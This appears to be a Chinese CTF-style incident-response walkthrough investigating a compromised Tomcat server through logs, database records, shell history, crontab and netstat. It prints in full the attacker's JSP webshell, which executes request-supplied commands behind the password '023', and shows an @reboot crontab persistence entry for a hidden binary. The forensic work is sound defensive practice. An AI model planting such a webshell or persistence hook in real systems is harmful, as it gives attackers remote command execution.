应急响应-tomcat服务

应急响应

简介

1
2
3
4
5
6
7
8
9
10
11
账号:root 密码:123456
ssh root@IP
1.请提交攻击者的IP地址
2.请提交攻击者使用的操作系统
3.请提交攻击者进入网站后台的密码
4.请提交攻击者首次攻击成功的时间,格式:DD/MM/YY:hh:mm:ss
5.请提交攻击者上传的恶意文件名(含路径)
6.请提交攻击者写入的恶意后门文件的连接密码
7.请提交攻击者创建的用户账户名称
8.请提交恶意进程的名称
9.请提交恶意进程对外连接的IP地址

tomacat的日志路径一般在:/opt/tomcat/logs

1.请提交攻击者的IP地址

history查看历史命令

image-20250412160104211

1
发现网站启动的是tomcat服务

image-20250412160613416

1
2
3
分析以下日志:
localhost_access_log.2023-05-08.txt
localhost_access_log.2023-05-09.txt

image-20250412161619255

1
2
发现仅统计出现一个IP
192.168.31.132

2.请提交攻击者使用的操作系统

grep -a 'POST' localhost_access_log.2023-05-08.txt

image-20250412162715495

1
2
192.168.31.132 - - [08/May/2023:04:59:22 -0400] "POST /check_register HTTP/1.1" 200 76 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.35
所以为Windows

3.请提交攻击者进入网站后台的密码

从数据库里找网站后台的密码

image-20250412163333760

1
2
在历史命令中看到网站数据库为mysql密码为P@ssw0rd!
尝试连接并获取到网站后台的密码

mysql -u root -pP@ssw0rd!
show databases;
use student_manager;
show tables;
image-20250412164042251

image-20250412164120221

1
2
3
| lx     | lx741852 | lx   | ?    | luoxiang@qq.com |
| Juneha | Juneha   |      |      | juneha@qq.com   |
再结合2可知 攻击者进入网站后台的密码为 Juneha

4.请提交攻击者首次攻击成功的时间,格式:DD/MM/YY:hh:mm:ss

image-20250412164956167

很清楚可以看出攻击者是利用文件上传攻击成功

1
2
3
4
192.168.31.132 - - [08/May/2023:05:02:16 -0400] "POST /upload_teacherImg HTTP/1.1" 200 84 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.35
故首次攻击成功时间为08/May/2023:05:02:16 -0400
如果要化为中国标准时间为东八区 故要加12
为08/May/2023:17:02:16

5.请提交攻击者上传的恶意文件名(含路径)

grep -nr "exec(" .|grep jsp

image-20250412170021053

grep -rl "exec("

image-20250412170056255

1
/opt/tomcat/webapps/ROOT/teacher/cmd.jsp

6.请提交攻击者写入的恶意后门文件的连接密码

image-20250412170232628

1
2
3
4
5
6
7
8
9
10
11
12
13
<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>
故为023

7.请提交攻击者创建的用户账户名称

history历史命令中发现Jumeha密码被更改

image-20250412171035941

1
2
3
4
5
6
  133  passwd Juneha
  134  crontab -e
  135  crontab -l
  136  /home/Juneha/.t0mcat &
  且在Juneha存在t0mcat可执行程序
即为Juneha

8.请提交恶意进程的名称

crontab -l存在计划任务

image-20250412171502885image-20250412171329103

1
2
@reboot  /home/Juneha/.t0mcat
故为 t0mcat

9.请提交恶意进程对外连接的IP地址

netstat -anp|grep .t0

image-20250412172444550

1
2
3
tcp        0      1 192.168.36.149:48008    114.114.114.114:8888    SYN_SENT    6093/./.t0mcat      
tcp        0      1 192.168.36.149:48006    114.114.114.114:8888    SYN_SENT    827/.t0mcat
故为 114.114.114.114